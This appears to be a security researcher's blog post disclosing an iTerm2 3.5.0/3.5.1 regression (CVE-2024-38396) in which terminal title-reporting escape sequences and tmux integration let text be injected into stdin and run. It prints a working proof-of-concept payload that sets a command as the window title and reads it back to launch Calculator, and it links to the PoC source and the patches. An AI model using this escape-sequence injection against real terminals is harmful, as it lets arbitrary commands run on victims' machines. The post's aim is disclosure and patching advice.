Regression turned into RCE

I am skipping an introduction to escape sequences here as I recently wrote more about them in my previous post. From a security perspective, they are to terminal emulators what XSS is to browsers.

This post is about a new bug which affects only iTerm2 3.5.0 and 3.5.1 (released on May 20 and June 11 respectively) because of a regression.

In versions prior to 3.5.0, window title reporting was disabled. So you could not just use following to retrieve the title of terminal window and put it in stdin.

$ echo -e "\e]21t"

Note: David Leadbeater also independently noticed this regression and reported it here

What is wrong with window title reporting?

Ps 2 escape sequence allows setting the window title.

An example:

echo -e "\033]0;This is the window title\a"

CSI Ps 21 t can be used to retrieve that title and put it in stdin as shown above. This makes exploitation very easy as at this point, all that is required is for the user to hit Enter and arbitrary code present in that title will happily execute itself.

Patch that disables title reporting by default: f1e89f78

Tmux integration made it worse

Native tmux integration (enabled by default) in iTerm2 had a weakness which allowed sneaking in the reported title and also provided a way to send newlines after the title was reported.

Patch: fc60236a

Can I haz that sweet PoC plz?

try this out yourself:

docker run --rm  vin01/escape-seq-test:cve-2024-38396

or

cat poc-iterm2-rce.txt

Download poc-iterm2-rce.txt

The file contains this payload \033]2;s&open -aCalculator&\a\033[21t \x1bP1000p%session-changed s which sets s&open -aCalculator& as window title and then retrieves it back to execute and pop a calculator.

Source code: https://github.com/vin01/poc-cve-2024-38396

A fix released within 2 days of reporting

Upgrade to iTerm2 3.5.2: https://iterm2.com/downloads.html

Please think twice before you enable Terminal may report window title setting in iTerm2. It might not be worth the security risk as it allows arbitrary text to end up in stdin which is never a good idea.